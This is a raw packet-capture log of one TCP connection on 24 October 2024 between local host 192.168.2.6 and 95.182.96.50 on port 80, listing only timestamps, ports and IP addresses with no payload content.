Oct 24, 2024 13:54:23.261656046 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.261698008 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.261708021 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.261743069 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.261745930 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.261778116 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.261794090 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.261812925 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.261814117 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.261856079 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.261892080 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.261895895 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.261928082 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.261980057 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.261981010 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.262042999 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.262070894 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.262083054 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.262108088 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.262125969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.262161970 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.262167931 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.262201071 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.262214899 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.262249947 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.262254000 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.262284994 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.262319088 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.262326956 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.262373924 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.262408972 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.262413979 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.262439966 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.262449026 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.262494087 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.262540102 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.262540102 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.262551069 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.262602091 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.262603045 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.262638092 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.262667894 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.262671947 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.262676954 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.262707949 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.262742996 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.262751102 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.262799025 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.262801886 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.262841940 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.262856960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.262892008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.262897015 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.262924910 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.262942076 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.262959003 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.262967110 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.262994051 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.262995958 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263029099 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263031006 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263061047 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263065100 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263098001 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263107061 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263129950 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263142109 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263165951 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263170958 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263200045 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263205051 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263236046 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263241053 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263269901 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263304949 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263323069 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263360977 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263391018 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263405085 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263406038 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263422966 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263425112 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263442039 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263448954 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263457060 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263458967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263475895 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263477087 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263494968 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263495922 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263511896 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263511896 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263531923 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263535976 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263544083 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263547897 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263565063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263569117 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263577938 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263581991 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263593912 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263600111 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263617992 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263626099 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263634920 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263637066 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263653040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263653040 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263669968 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263674974 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263684988 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263689041 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263705015 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263708115 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263724089 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263725042 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263741016 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263741970 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263752937 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263758898 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263775110 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263789892 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263792992 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263807058 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263816118 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263822079 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263839960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263840914 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263856888 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263870001 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263870955 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263880968 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263887882 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263889074 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263896942 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263911963 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263926983 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263933897 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263942957 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263950109 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263959885 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263963938 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263978958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.263978958 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.263997078 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.264014006 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.264018059 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.264018059 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.264029980 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.264039040 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.264045954 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.264050007 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.264062881 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.264065981 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.264077902 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.264077902 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.264096022 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.264098883 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.264112949 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.264117002 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.264131069 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.264137983 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.264147997 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.264158010 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.264164925 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.264172077 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.264179945 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.264185905 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.264198065 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.264199972 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.264214993 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.264216900 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.264228106 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.264230967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.264246941 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.264261007 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.264264107 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.264271021 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.264281988 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.264286995 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.264297962 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.264300108 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.264312983 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.264324903 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.303472042 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.303525925 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.303561926 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.303579092 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.303600073 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.303603888 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.303637028 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.303659916 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.303673983 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.303678989 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.303713083 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.303715944 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.303764105 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.372389078 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.372437954 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.372495890 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.372528076 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.372528076 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.372534037 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.372556925 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.372571945 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.372582912 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.372611046 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.372643948 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.372644901 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.372653008 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.372700930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.372725964 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.372740030 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.372756004 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.372795105 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.372798920 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.372831106 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.372850895 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.372864962 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.372884989 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.372920990 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.372927904 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.372972965 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.373013973 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.373040915 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.373048067 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.373085022 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.373114109 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.373121977 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.373158932 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.373192072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.373192072 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.373225927 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.373230934 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.373250961 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.373265028 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.373269081 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.373301029 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.373336077 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.373338938 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.373374939 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.373404026 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.373409033 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.373433113 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.373441935 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.373457909 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.373497963 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.373514891 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.373549938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.373553991 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.373585939 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.373589039 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.373620033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.373625994 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.373656988 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.373658895 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.373691082 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.373694897 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.373728991 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.373747110 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.373799086 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.373841047 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.373855114 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.373898029 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.373912096 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.373949051 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.373958111 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.373981953 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.373987913 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.374032974 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.374073982 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.374087095 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.374123096 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.374130964 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.374177933 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.374217033 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.374233007 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.374265909 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.374285936 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.374303102 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.374320030 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.374372005 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.374413013 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.374424934 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.374459028 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.374504089 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.374514103 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.374543905 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.374553919 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.374578953 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.374596119 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.374612093 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.374629974 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.374665022 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.374706984 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.374720097 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.374763012 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.374775887 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.374819040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.374847889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.374861002 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.374881983 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.374885082 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.374917984 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.374922991 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.374953985 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.374958038 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.374989033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.374994040 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.375024080 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.375026941 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.375058889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.375062943 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.375093937 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.375097036 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.375128031 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.375137091 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.375161886 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.375165939 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.375199080 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.375220060 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.375231981 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.375236034 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.375267982 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.375274897 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.375303984 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.375340939 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.375354052 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.375379086 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.375412941 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.375423908 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.375451088 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.375458956 CEST	49714	80	192.168.2.6	95.182.96.50
